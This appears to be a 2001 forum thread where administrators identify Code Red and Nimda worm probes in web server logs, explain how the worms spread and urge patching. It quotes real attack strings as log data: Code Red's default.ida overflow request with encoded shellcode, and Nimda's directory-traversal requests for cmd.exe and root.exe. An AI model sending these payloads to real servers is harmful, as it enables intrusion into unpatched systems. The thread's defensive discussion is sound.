Apache

Anon

This is the line I saw in the access log file
of the Apache web server. There is no file by the name of default.ida in my directories and also I checked and found out that no one had acessed my machine from machine # 100.50.1.1 on my LAN. This site runs on my LAN and i am wondering if this is a Hack attemt or something...

could somebody pls demystify what this means and also where can I find info on the APache web severs return codes.

100.50.1.1 - - [25/Sep/2001:15:10:38 +0530] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 265

mithril

Tis indeed a hack attack. Say hello to Code Red🙂 default.ida is the file Code Red uses to worm into IIS machines...... Nimda may try to use it too since it attacks the hole opened by Code Red. However, I'm not positive about Nimda's methods so don't quote me on it. Although it's annoying and taking up resources, you're obviously in no danger on Apache.

geoff

Anon

I am running Apache on windows. Can I run a firewall to stop such requests. If yes where can I get a good free firewall s/w to do the job. What should I tell the ppl running the machines from where the request came.?

Thanks man.

[deleted]

Theoretically you can protect yourself with a firewall, but the Code-red virus uses IIS security holes, which Apache doesn't have, so you're safe as long as you use apache and NOT IIS.

smarlowe

Don't worry about the firewall, but you could probably make a setenvif entry in httpd.conf that would tell apache to not log this stuff anymore.

You should the people running the machines where the request came from that they have code red or some other worm on their computer. then offer to help them install Apache or Xitami or some other more secure server.

Anon

Unfortunately, Nimda doesn't restrict itself to IIS for infection. It can infect anyone on an unpatched Windows machine. It will:

Infect you through email.
Infect you through infected web pages you visit.
Infect you via network shares.
If there are no network shares, it will even try to make one.

If you are on an Apache you are not completely safe, though the chance of being truly affected (vs. infected) are a bit low lately. The attacks are blind, the worm uses a dynamically created list of IPs to attack. If you are on the list, you will receive from 14-16 hits, whether you are IIS or Apache or iPlanet or whatever. If you get hit in too short a span of time by too many infected machines (doesn't have to be servers), DOS.

I recommend everyone visit the www.cert.org if you haven't already done so to check out the entire story on Nimda, and any other problems that might be out there that could directly affect any of us.

Nimda and its cousin Code Red should ring warning bells in all our heads, whether we use Windows/IIS/PHP or Linux/Apache or whatever. These two worms did not attack new and unknown vulnerabilities in Windows. Code Red attacked a vulnerability that had been identified a full month prior in a special security bulletin, and a patch was available that took 3 minutes to download and 30 seconds to apply. Some of the attacks Nimda uses date back to vulnerabilities identified in 1998! Why then so successful? Administrators who are either too lax about their job or who don't know what they are doing unfortunately. And whether you hate Windows or not, if you admin a box running any OS, it is your job to make sure it is secure. MS is the big dog on the street so it is target numero uno, but Linux and the rest do have their vulnerabilities as well. Take a few moments to track them down and patch them rather than becoming a stat.

BTW, if interested, here is a Nimda attack (get them all the time on my box on DSL, as long as they return a 404 I'm happy. I replaced the originating IP address, I am trying to contact the guy and I respect his privacy):

02:46:58 0.0.0.0 - 80 GET /scripts/root.exe /c+dir 404 3 3396 72 70 - -
02:46:59 0.0.0.0 - 80 GET /MSADC/root.exe /c+dir 404 3 3396 70 0 - -
02:47:01 0.0.0.0 - 80 GET /c/winnt/system32/cmd.exe /c+dir 404 3 3396 80 0 - -
02:47:02 0.0.0.0 - 80 GET /d/winnt/system32/cmd.exe /c+dir 404 3 3396 80 0 - -
02:47:03 0.0.0.0 - 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 96 10 - -
02:47:05 0.0.0.0 - 80 GET /vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 87 0 117 10 - -
02:47:05 0.0.0.0 - 80 GET /mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 117 0 - -
02:47:05 0.0.0.0 - 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 404 3 3396 145 0 - -
02:47:07 0.0.0.0 - 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 - -
02:47:09 0.0.0.0 - 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 - -
02:47:11 0.0.0.0 - 80 GET /winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 - -
02:47:13 0.0.0.0 - 80 GET /winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 - -
02:47:15 0.0.0.0 - 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 98 0 - -
02:47:15 0.0.0.0 - 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 96 0 - -
02:47:16 0.0.0.0 - 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 100 0 - -
02:47:18 0.0.0.0 - 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 3 3396 96 10 - -

Jim